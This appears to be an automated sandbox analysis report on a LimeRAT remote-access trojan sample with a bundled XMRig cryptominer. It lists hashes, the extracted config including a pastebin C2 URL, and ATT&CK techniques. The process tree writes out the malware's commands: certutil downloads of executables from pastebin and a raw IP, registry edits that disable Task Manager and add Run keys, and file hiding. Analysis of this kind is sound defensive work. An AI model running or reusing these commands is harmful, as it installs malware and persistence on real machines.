limerat | 75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6

Analysis

max time kernel
56s
max time network
115s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
14-09-2022 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eb9e4955edda276425933aea122f9a84.exe
Size

47KB
MD5

eb9e4955edda276425933aea122f9a84
SHA1

6763106ffdc12cf213f579f72c1c6e8f3272fa9c
SHA256

75180613894eb3345319cc207d66688e5219035a05e97d330a2397d51cc397c6
SHA512

621cb956531c7e70715cb14eb3b5ff030fa1b3387a97b7ef04a847bdb54878ad713162115c78ce46dca3d3f11b5742a23e8a1fecd34e30429e934c487aafa60f
SSDEEP

768:e7DiMIvhyqeFRKUKPl2+Vf7lWDVkUmg1/oRxf0IbvDOPbPlEnNFqoBc:KiMdzgdoEfskV8Of9bvDI7GDlBc

Score

10^/10

limerat xmrig evasion miner persistence rat upx

Malware Config

Extracted

Family

limerat

Attributes

aes_key
beodz
antivm
false
c2_url
https://pastebin.com/raw/PEKpeQWU
delay
3
download_payload
false
install
true
install_name
winlogon.exe
main_folder
AppData
pin_spread
false
sub_folder
\AppData\Windows Protector\
usb_spread
false

Signatures

LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 8 IoCs

miner

Processes:

resource	yara_rule
behavioral1/files/0x0006000000014f93-187.dat	xmrig
behavioral1/files/0x0006000000014f93-191.dat	xmrig
behavioral1/files/0x0006000000014f93-193.dat	xmrig
behavioral1/files/0x0006000000014f93-192.dat	xmrig
behavioral1/memory/2688-196-0x000000013F400000-0x000000013FBC8000-memory.dmp	xmrig
behavioral1/memory/2688-198-0x000000013F400000-0x000000013FBC8000-memory.dmp	xmrig
behavioral1/files/0x0006000000014f93-201.dat	xmrig
behavioral1/memory/3020-208-0x000000013F4A0000-0x000000013FC68000-memory.dmp	xmrig

Blocklisted process makes network request 3 IoCs

Processes:

WScript.exeWScript.exe

flow	pid	Process
21	1148	WScript.exe
226	1148	WScript.exe
328	1144	WScript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file

Executes dropped EXE 5 IoCs

Processes:

IE.exewindowsapp.exeirom.comlirb.comwinlogon.exe

pid	Process
536	IE.exe
988	windowsapp.exe
1996	irom.com
1820	lirb.com
1880	winlogon.exe

Sets file to hidden 1 TTPs 7 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
1544	attrib.exe
1084	attrib.exe
1380	attrib.exe
1364	attrib.exe
1520	attrib.exe
1092	attrib.exe
924	attrib.exe

UPX packed file 13 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1976-59-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/memory/1976-84-0x0000000140000000-0x0000000140023000-memory.dmp	upx
behavioral1/files/0x00060000000142ce-85.dat	upx
behavioral1/files/0x00060000000142ce-86.dat	upx
behavioral1/files/0x00060000000142ce-87.dat	upx
behavioral1/files/0x00060000000142ce-88.dat	upx
behavioral1/files/0x00060000000142ce-90.dat	upx
behavioral1/memory/988-114-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x00060000000142c6-153.dat	upx
behavioral1/files/0x000600000001422f-155.dat	upx
behavioral1/files/0x000a0000000139e2-157.dat	upx
behavioral1/memory/988-206-0x0000000000400000-0x0000000000419000-memory.dmp	upx
behavioral1/files/0x00060000000142ce-205.dat	upx

Drops startup file 9 IoCs

Processes:

attrib.exexcopy.exeWScript.exeWScript.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	attrib.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	attrib.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	xcopy.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backup.vbs	WScript.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\main.vbs	WScript.exe

Loads dropped DLL 9 IoCs

Processes:

IE.exelirb.com

pid	Process
536	IE.exe
536	IE.exe
536	IE.exe
536	IE.exe
1820	lirb.com
1820	lirb.com
1820	lirb.com
1820	lirb.com
1820	lirb.com

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WScript.exeWScript.exereg.exereg.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\software\microsoft\windows\currentversion\run	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Updates = "C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Windows Updates\\winupdate.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Logons = "C:\\Windows (x86)\\explorer.exe"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\backup = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\backup.vbs\""	WScript.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe
Key created	\REGISTRY\MACHINE\software\Wow6432Node\microsoft\windows\currentversion\run	WScript.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\main = "\"C:\\Users\\Admin\\AppData\\Roaming\\AppData\\Flash Player\\\\main.vbs\""	WScript.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Kills process with taskkill 3 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid	Process
924	taskkill.exe
1576	taskkill.exe
1648	taskkill.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exe

pid	Process
956	reg.exe
764	reg.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

Processes:

PING.EXE

pid	Process
3032	PING.EXE

Suspicious behavior: CmdExeWriteProcessMemorySpam 3 IoCs

Processes:

IE.exeirom.comlirb.com

pid	Process
536	IE.exe
1996	irom.com
1820	lirb.com

Suspicious behavior: EnumeratesProcesses 1 IoCs

Processes:

winlogon.exe

pid	Process
1880	winlogon.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1620	WMIC.exe
Token: SeSecurityPrivilege	1620	WMIC.exe
Token: SeTakeOwnershipPrivilege	1620	WMIC.exe
Token: SeLoadDriverPrivilege	1620	WMIC.exe
Token: SeSystemProfilePrivilege	1620	WMIC.exe
Token: SeSystemtimePrivilege	1620	WMIC.exe
Token: SeProfSingleProcessPrivilege	1620	WMIC.exe
Token: SeIncBasePriorityPrivilege	1620	WMIC.exe
Token: SeCreatePagefilePrivilege	1620	WMIC.exe
Token: SeBackupPrivilege	1620	WMIC.exe
Token: SeRestorePrivilege	1620	WMIC.exe
Token: SeShutdownPrivilege	1620	WMIC.exe
Token: SeDebugPrivilege	1620	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1620	WMIC.exe
Token: SeRemoteShutdownPrivilege	1620	WMIC.exe
Token: SeUndockPrivilege	1620	WMIC.exe
Token: SeManageVolumePrivilege	1620	WMIC.exe
Token: 33	1620	WMIC.exe
Token: 34	1620	WMIC.exe
Token: 35	1620	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe
Token: SeSystemProfilePrivilege	1224	WMIC.exe
Token: SeSystemtimePrivilege	1224	WMIC.exe
Token: SeProfSingleProcessPrivilege	1224	WMIC.exe
Token: SeIncBasePriorityPrivilege	1224	WMIC.exe
Token: SeCreatePagefilePrivilege	1224	WMIC.exe
Token: SeBackupPrivilege	1224	WMIC.exe
Token: SeRestorePrivilege	1224	WMIC.exe
Token: SeShutdownPrivilege	1224	WMIC.exe
Token: SeDebugPrivilege	1224	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1224	WMIC.exe
Token: SeRemoteShutdownPrivilege	1224	WMIC.exe
Token: SeUndockPrivilege	1224	WMIC.exe
Token: SeManageVolumePrivilege	1224	WMIC.exe
Token: 33	1224	WMIC.exe
Token: 34	1224	WMIC.exe
Token: 35	1224	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1224	WMIC.exe
Token: SeSecurityPrivilege	1224	WMIC.exe
Token: SeTakeOwnershipPrivilege	1224	WMIC.exe
Token: SeLoadDriverPrivilege	1224	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

eb9e4955edda276425933aea122f9a84.execmd.exeIE.exewindowsapp.execmd.exe

description	pid	Process	procid_target
PID 1976 wrote to memory of 1520	1976	eb9e4955edda276425933aea122f9a84.exe	27
PID 1976 wrote to memory of 1520	1976	eb9e4955edda276425933aea122f9a84.exe	27
PID 1976 wrote to memory of 1520	1976	eb9e4955edda276425933aea122f9a84.exe	27
PID 1520 wrote to memory of 616	1520	cmd.exe	29
PID 1520 wrote to memory of 616	1520	cmd.exe	29
PID 1520 wrote to memory of 616	1520	cmd.exe	29
PID 1520 wrote to memory of 1532	1520	cmd.exe	32
PID 1520 wrote to memory of 1532	1520	cmd.exe	32
PID 1520 wrote to memory of 1532	1520	cmd.exe	32
PID 1520 wrote to memory of 852	1520	cmd.exe	33
PID 1520 wrote to memory of 852	1520	cmd.exe	33
PID 1520 wrote to memory of 852	1520	cmd.exe	33
PID 1520 wrote to memory of 1620	1520	cmd.exe	34
PID 1520 wrote to memory of 1620	1520	cmd.exe	34
PID 1520 wrote to memory of 1620	1520	cmd.exe	34
PID 1520 wrote to memory of 1224	1520	cmd.exe	36
PID 1520 wrote to memory of 1224	1520	cmd.exe	36
PID 1520 wrote to memory of 1224	1520	cmd.exe	36
PID 1520 wrote to memory of 1908	1520	cmd.exe	37
PID 1520 wrote to memory of 1908	1520	cmd.exe	37
PID 1520 wrote to memory of 1908	1520	cmd.exe	37
PID 1520 wrote to memory of 956	1520	cmd.exe	38
PID 1520 wrote to memory of 956	1520	cmd.exe	38
PID 1520 wrote to memory of 956	1520	cmd.exe	38
PID 1520 wrote to memory of 1964	1520	cmd.exe	39
PID 1520 wrote to memory of 1964	1520	cmd.exe	39
PID 1520 wrote to memory of 1964	1520	cmd.exe	39
PID 1520 wrote to memory of 860	1520	cmd.exe	40
PID 1520 wrote to memory of 860	1520	cmd.exe	40
PID 1520 wrote to memory of 860	1520	cmd.exe	40
PID 1520 wrote to memory of 1084	1520	cmd.exe	41
PID 1520 wrote to memory of 1084	1520	cmd.exe	41
PID 1520 wrote to memory of 1084	1520	cmd.exe	41
PID 1520 wrote to memory of 536	1520	cmd.exe	42
PID 1520 wrote to memory of 536	1520	cmd.exe	42
PID 1520 wrote to memory of 536	1520	cmd.exe	42
PID 1520 wrote to memory of 536	1520	cmd.exe	42
PID 1520 wrote to memory of 684	1520	cmd.exe	43
PID 1520 wrote to memory of 684	1520	cmd.exe	43
PID 1520 wrote to memory of 684	1520	cmd.exe	43
PID 536 wrote to memory of 988	536	IE.exe	44
PID 536 wrote to memory of 988	536	IE.exe	44
PID 536 wrote to memory of 988	536	IE.exe	44
PID 536 wrote to memory of 988	536	IE.exe	44
PID 988 wrote to memory of 1352	988	windowsapp.exe	45
PID 988 wrote to memory of 1352	988	windowsapp.exe	45
PID 988 wrote to memory of 1352	988	windowsapp.exe	45
PID 988 wrote to memory of 1352	988	windowsapp.exe	45
PID 1352 wrote to memory of 1544	1352	cmd.exe	47
PID 1352 wrote to memory of 1544	1352	cmd.exe	47
PID 1352 wrote to memory of 1544	1352	cmd.exe	47
PID 1352 wrote to memory of 1576	1352	cmd.exe	48
PID 1352 wrote to memory of 1576	1352	cmd.exe	48
PID 1352 wrote to memory of 1576	1352	cmd.exe	48
PID 1352 wrote to memory of 1940	1352	cmd.exe	49
PID 1352 wrote to memory of 1940	1352	cmd.exe	49
PID 1352 wrote to memory of 1940	1352	cmd.exe	49
PID 1352 wrote to memory of 1648	1352	cmd.exe	50
PID 1352 wrote to memory of 1648	1352	cmd.exe	50
PID 1352 wrote to memory of 1648	1352	cmd.exe	50
PID 1352 wrote to memory of 1192	1352	cmd.exe	51
PID 1352 wrote to memory of 1192	1352	cmd.exe	51
PID 1352 wrote to memory of 1192	1352	cmd.exe	51
PID 1352 wrote to memory of 924	1352	cmd.exe	52

Views/modifies file attributes 1 TTPs 15 IoCs

evasion

Hidden Files and Directories

T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exeattrib.exe

pid	Process
1380	attrib.exe
1092	attrib.exe
1912	attrib.exe
1544	attrib.exe
1084	attrib.exe
1364	attrib.exe
2516	attrib.exe
1604	attrib.exe
1520	attrib.exe
296	attrib.exe
1532	attrib.exe
1696	attrib.exe
1164	attrib.exe
924	attrib.exe
3068	attrib.exe

C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe
"C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1976
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F651.tmp\F652.bat C:\Users\Admin\AppData\Local\Temp\eb9e4955edda276425933aea122f9a84.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1520
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
    3⤵
    PID:616
- - C:\Windows\system32\find.exe
    find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
    3⤵
    PID:1532
- - C:\Windows\system32\cmd.exe
    cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
    3⤵
    PID:852
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='taskmgr.exe' delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='Taskmgr.exe' delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where name='xmrig.exe' delete
    3⤵
    PID:1908
- - C:\Windows\system32\reg.exe
    REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    - Modifies registry key
    PID:956
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f https://pastebin.com/raw/03Gje1tb "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
    3⤵
    PID:1964
- - C:\Windows\system32\find.exe
    find /c "set active" "C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat"
    3⤵
    PID:860
- - C:\Windows\system32\certutil.exe
    certutil -urlcache -split -f "http://52.77.214.77:8083/IE.exe" C:\Users\Admin\AppData\Local\Temp\IE.exe
    3⤵
    PID:1084
- - C:\Users\Admin\AppData\Local\Temp\IE.exe
    "C:\Users\Admin\AppData\Local\Temp\IE.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:536
  - - C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe
      "C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:988
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2FA9.tmp\2FBA.bat C:\Users\Admin\AppData\Local\Temp\updateW\windowsapp.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1352
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='taskmgr.exe' delete
        6⤵
        
        PID:1544
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM taskmgr.exe /F
        6⤵
        Kills process with taskkill
        
        PID:1576
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Taskmgr.exe' delete
        6⤵
        
        PID:1940
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM Taskmgr.exe /F
        6⤵
        Kills process with taskkill
        
        PID:1648
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='xmrig.exe' delete
        6⤵
        
        PID:1192
      - C:\Windows\system32\taskkill.exe
        
        taskkill /IM xmrig.exe /F
        6⤵
        Kills process with taskkill
        
        PID:924
      - C:\Windows\system32\reg.exe
        
        REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        6⤵
        Modifies registry key
        
        PID:764
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:1604
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        6⤵
        Views/modifies file attributes
        
        PID:1696
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\backup.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        6⤵
        
        PID:468
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\main.vbs" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player" /K /D /H /Y
        6⤵
        
        PID:1408
      - C:\Users\Admin\AppData\Local\Temp\updateW\irom.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\irom.com"
        6⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1996
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\main.vbs"
        7⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:1148
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\backup.vbs"
        7⤵
        Blocklisted process makes network request
        Drops startup file
        Adds Run key to start application
        
        PID:1144
      - C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\lirb.com"
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:1820
        
        C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe
        
        "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\winlogon.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        
        PID:1880
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1084
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Flash Player\"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1380
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1364
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Protector"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1520
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1092
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f https://pastebin.com/raw/gGQgTLmg "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        6⤵
        
        PID:1544
      - C:\Windows\system32\find.exe
        
        find /c "ECHO OK" "C:\Users\Admin\AppData\Local\Temp\VERIU.BAT"
        6⤵
        
        PID:1196
      - C:\Windows\system32\cmd.exe
        
        cmd /c del "C:\Users\Admin\AppData\Local\Temp\updateW\"C:\Users\Admin\AppData\Local\Temp\VERIU.BAT""
        6⤵
        
        PID:1084
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='Microsoft.exe' delete
        6⤵
        
        PID:1248
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where name='winupdate.exe' delete
        6⤵
        
        PID:1740
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
        6⤵
        Adds Run key to start application
        
        PID:1988
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
        6⤵
        Adds Run key to start application
        
        PID:1716
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        6⤵
        Views/modifies file attributes
        
        PID:1164
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:296
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
        6⤵
        Drops startup file
        Views/modifies file attributes
        
        PID:1912
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates" /K /D /H /Y
        6⤵
        
        PID:1960
      - C:\Windows\system32\xcopy.exe
        
        xcopy "C:\Users\Admin\AppData\Local\Temp\updateW\Microsoft.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" /K /D /H /Y
        6⤵
        Drops startup file
        
        PID:864
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates\*.*"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:924
      - C:\Windows\system32\attrib.exe
        
        attrib +s +h "C:\Users\Admin\AppData\Roaming\AppData\Windows Updates"
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:1544
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        6⤵
        
        PID:568
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        6⤵
        
        PID:684
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:1532
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/win.com" "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        6⤵
        
        PID:1536
      - C:\Windows\system32\certutil.exe
        
        certutil -urlcache -split -f "http://52.77.214.77:8083/xm/64a1.com" "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        6⤵
        
        PID:2828
      - C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\64a1.com"
        6⤵
        
        PID:2984
        
        C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Windows (x86)\aarun.vbs"
        7⤵
        
        PID:1776
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c ""C:\Windows (x86)\xagal.bat" "
        8⤵
        
        PID:2308
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        9⤵
        
        PID:2452
        
        C:\Windows\SysWOW64\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        9⤵
        Views/modifies file attributes
        
        PID:2516
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wmic csproduct get UUID /format:list |find "="
        9⤵
        
        PID:2576
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        wmic csproduct get UUID /format:list
        10⤵
        
        PID:560
        
        C:\Windows\SysWOW64\find.exe
        
        find "="
        10⤵
        
        PID:2608
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c del "C:\Windows (x86)\xagal.bat"
        9⤵
        
        PID:2732
        
        C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        9⤵
        
        PID:2688
      - C:\Users\Admin\AppData\Local\Temp\updateW\win.com
        
        "C:\Users\Admin\AppData\Local\Temp\updateW\win.com"
        6⤵
        
        PID:3000
      - C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 5
        6⤵
        Runs ping.exe
        
        PID:3032
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
        6⤵
        
        PID:2944
      - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic process where ExecutablePath='C:\\Windows (x86)\\PolicyDefinitions\\en-US\\regedit.exe' delete
        6⤵
        
        PID:2832
      - C:\Windows\system32\attrib.exe
        
        attrib -s -h "C:\Windows (x86)\*.*"
        6⤵
        Views/modifies file attributes
        
        PID:3068
      - C:\Windows (x86)\explorer.exe
        
        "C:\Windows (x86)\explorer.exe"
        6⤵
        
        PID:3020
- - C:\Windows\system32\cmd.exe
    cmd /c del "C:\Users\Admin\AppData\Local\Temp\"C:\Users\Admin\AppData\Local\Temp\windowscheck_182352115_log.bat""
    3⤵
    PID:684

Network

MITRE ATT&CK Enterprise v6

Initial Access

